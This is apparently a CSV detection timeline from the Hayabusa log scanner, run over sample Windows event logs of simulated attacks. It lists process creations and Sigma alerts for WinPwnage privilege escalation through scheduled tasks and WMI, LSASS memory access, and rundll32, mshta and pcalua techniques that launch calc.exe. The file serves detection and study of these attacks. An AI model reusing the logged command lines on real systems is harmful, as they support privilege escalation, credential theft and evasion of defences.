2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,,New Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx
2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
